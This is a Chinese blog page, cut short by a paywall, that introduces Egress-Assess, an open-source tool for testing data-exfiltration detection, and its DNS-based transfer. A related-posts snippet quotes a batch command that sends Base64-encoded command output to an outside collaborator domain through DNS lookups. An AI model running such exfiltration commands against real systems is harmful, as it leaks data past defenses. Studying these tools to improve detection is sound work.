pck处理工具源码_基于DNS的数据泄露开源测试工具篇

最新推荐文章于 2023-09-22 09:45:38 发布
最新推荐文章于 2023-09-22 09:45:38 发布
阅读量388 收藏
点赞数
文章标签: pck处理工具源码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39876282/article/details/111663685
版权
本文详细分析了Egress-Assess,一个用于测试数据泄露检测能力的开源项目,重点探讨了其利用DNS进行数据窃取的源码,包括服务端和客户端的工作原理。Egress-Assess通过DNS TXT和A记录实现数据传输,其优势在于多线程处理和直接传送文件数据,但缺乏文件完整性校验。
摘要由CSDN通过智能技术生成

注:点击文末[阅读原文],可查看系列文章。

一、前言

在之前的文章中已经对DET、PyExfil和DNSExfiltrator三个开源项目利用DNS完成数据窃取进行了简要分析。本文将继续讨论如图1中所示的本次关注的最后一个开源工具Egress-Assess。

8b59eb304184cdcbfc135405bfa3a01a.png

图1 DET、PyExfil、DNSExfiltrator、Egress-Assess的首页展示

二、Egress-Assess简介

Egress-Assess是一个用于测试数据泄露检测能力的开源项目[1]。该项目搭建了基本框架,并实现了利用多种协议完成数据窃取,将该项目源码结构梳理如图2。从图2中可以看出,Egress-Assess项目实现的可利用协议主要有:dns、ftp、http、https、icmp、sftp、smb、smtp等,我们重点关注利用DNS完成数据窃取的部分。

e7541df5e8d676b2654c2f68a58d16ed.png

图2Egress-Assess项目概况

Egress-Assess采用C/S模式,运行工具需要先搭建服务端,然后客户

最低0.47元/天 解锁文章
weixin_39876282
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C++:实现DNS劫持(附完整码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
12-26 1070
C++:实现DNS劫持(附完整码)
pck打包工具
10-28
pck打包工具
码+文档】DNS 中继服务器程序
yuxibdd的博客
07-13 439
该模块的主要作用是处理参数、初始化服务器、接收客户端的请求以及将回应发送到客户端。该模块的函数调用图见图 2。除去基本要求外,我们还完成了对 IPv6 DNS 查询的处理,并可以在执行程序时对多个参数进行指定,其可以指定的参数见图 1。检索结果为 IP 地址 0.0.0.0 时,则向客户端返回 “域名不存在 (NXDomain)” 的报错消息。MuddyDNS 共分为主模块,服务器模块以及工具模块三个模块。表中未检索到该域名时,则向因特网 DNS 服务器发出查询,并将结果返回给客户端。
DNSWatch:一款功能强大的DNS流量嗅探和分析工具
HUANGXIN9898的博客
09-22 865
1、嗅探和分析DNS请求与响应;2、显示DNS请求对应的和目的IP地址;3、可选的Verbose模式提供更详细的数据包审查详情;4、支持将分析结果存储到指定的输出文件;5、通过指定的目标IP地址过滤DNS流量;6、将DNS请求存储到一个数据库中以便后续进行详细分析;7、支持分析DNS类型;8、支持DNS over HTTPS(DoH);
容器DNS Ip status check模块码解析(golang)
小二黑嘿嘿的博客
02-28 582
Ip status check组件对域名domain进行ping探活、及域名的主机ip进行周期性tcp探活,依据探活结果更新etcd中域名对应关系及主机存活状态,包括dns-scheduler和dns-scanner两个模块。 文章目录一:dns-scheduler模块1.1 dns-scheduler配置参数说明1.2 SyncJobPath()1.3 WatchJobPath()1.4 i...
png解包工具&pck解包工具
12-05
"MHZX解包工具.exe"可能是一个专门用于处理"MHZX"(可能是某个游戏或应用的缩写)中PNG和PCK文件的实用程序。这个工具允许用户将PNG图像转换为PCK格式,或者将已打包的PCK文件解包,以便于访问和修改其内部的PNG图像...
WinPCK_x86支持到3000+最新客户端_PCK_PCK软件_winpck最新_
10-02
"PCK"可能是指这种特定类型的文件格式,而"PCK软件"则指的是处理这种文件格式的工具。"winpck最新"暗示这是WinPCK软件的最新更新,意味着它包含了最新的功能和优化。 描述中提到的"打开pck文件的好软件!可阅读、...
pck解包工具
05-03
PCK解包工具中,zlibwapi.dll可能用于处理PCK文件中的数据压缩与解压缩操作。由于Zlib库的高效性和跨平台性,许多软件都会使用它来处理数据压缩需求。 2. **PCK打包工具.exe**:这是解包工具的可执行文件,用户...
pck.zip_PCK
09-22
标题 "pck.zip_PCK" 暗示我们正在处理一个与文件打包相关的主题,而“package class for packing multiple files in one”描述则指出这可能是一个编程类或库,用于将多个文件打包到一个单一的容器中。标签 "pck" ...
pck处理工具码_解析Android性能稳定性测试工具mobileperf
weixin_39626586的博客
12-05 304
https://github.com/alibaba/mobileperf 码地址。我们之前对mobileperf指南进行了讲解,这次,我们看下里面的代码。首先,我们看下目录config.conf需要配置的文件, LICENSE 开源的一个协议。logs,日志,mobileperf 码, results 日志存放地方。 启动...
dns-exfiltrator:通过DNS查询提取数据。 基于CertUtil和NSLookup
04-22
DNS提取器 通过DNS查询提取数据。 基于CertUtil和NSLookup。 命令输出将使用CertUtil以Base64编码进行编码,并使用NSLookup每次查询最多以63个字符为大块进行输出。 用于泄漏命令输出的批处理脚本已在Windows 10 Enterprise OS(64位)上进行了测试。 用于解码有效负载的Bash脚本已在Kali Linux v2020.3(64位)上进行了测试。 出于教育目的。 希望对您有所帮助! 要做的事情:使整个批处理脚本成为一个线性。 要做的事情:完成项目。 怎么跑 要做的事情:使本节更加清楚。 从打开命令提示符,然后运行以下命令: dns_exfiltrator.bat d2hvYW1p xyz.burpcollaborator.net 您的命令必须是采用Base64编码的批处理单行代码,例如d2hvYW1pICYmIG5ld
PCK封包解包完美工具
01-04
非常不错的完美封包解包~~~~~~~~~~~~~
pck文件编辑工具
09-23
可用于pck压缩包的查看和编辑,非常方便,非常快捷的一款工具
winpck编辑器
09-13
winpck编辑器 解压pck文件
PyExfil:用于数据渗漏的Python包
04-13
PyExfil 压力测试检测与创造力 PyExfil最初是一个PoC,是一个游乐场,后来发展成为更多东西。 在我看来,这仍然是一个混乱的PoC,需要更多的工作和测试才能变得stable 。 PyExfil的目的是设置尽可能多的渗出,到现在还通信,可以通过各种威胁的演员/恶意软件身边绕过各种检测和缓解的工具和技术可以使用的技术。 您可以在官方跟踪更改。 简而言之,它被用作测试工具,而不是实际的Red Teaming工具。 尽管大多数技术和方法应易于移植并编译到各种操作系统,但某些实验还是很稳定的,但传输机制在所有技术上都应稳定​​。 克隆它,将其部署在组织中的节点上,并查看哪些系统可以采用哪些技术。 入门 画中画 对于使用pip (不一定是最新的): pip install --user PyExfil 先决条件 对于来: git clone https://www.github
oracle pck文件是什么,PCK文件扩展名 - 什么是.pck以及如何打开? - ReviverSoft
weixin_33267354的博客
04-13 6354
你在这里因为你有,有一个文件扩展名结尾的​​文件.pck.文件与文件扩展名.pck只能通过特定的应用程序推出。这有可能是.pck文件是数据文件,而不是文件或媒体,这意味着他们并不是在所有观看。什么是一&nbsp.pck&nbsp文件?文件的扩展名PCK是由微软开发的系统文件。他们大多是被称为系统中心配置管理器程序包文件,因为它们主要用于系统中心配置管理器(SCCM),其...
基于dnsexfiltrator的DNS隧道研究
ailx10
05-20 270
dnsexfiltrator 主要利用子域名编码来泄漏数据dnsexfiltrator 基于DNS协议TXT记录,从僵尸主机传输文件到C2服务器的一种工具,而dnslivery 是一种基于DNS协议TXT记录,将C2服务器中的文件传输到僵尸主机的一种工具,二者传输文件方向更好相反。dnsexfiltrator 传递 1.03M的文件,需要6460个包,那么一个包传递167.23个字节,由于bas...
base32解码工具_技术派 | 基于DNS数据泄露开源测试工具篇(三)
weixin_39806779的博客
11-28 729
01前言在基于DNS数据窃取开源工具篇(一)和(二)中,已经讨论了DET和PyExfil两个开源项目关于利用DNS完成数据窃取的部分。本文将继续讨论如图1中所示的第三个开源工具DNSExfiltrator。图1 DET、PyExfil、DNSExfiltrator、Egress-Assess的首页展示02DNSExfiltrator简介DNSExfitrator开源项目[1]是一...
fy_recover_data.pck下载
最新发布
12-20
fy_recover_data.pck 是一个用于数据恢复的文件,通过该文件可以恢复丢失或损坏...总之,fy_recover_data.pck 文件是一个用于数据恢复的工具,下载并使用时需要注意文件安全性和操作步骤,以确保有效地恢复丢失的数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值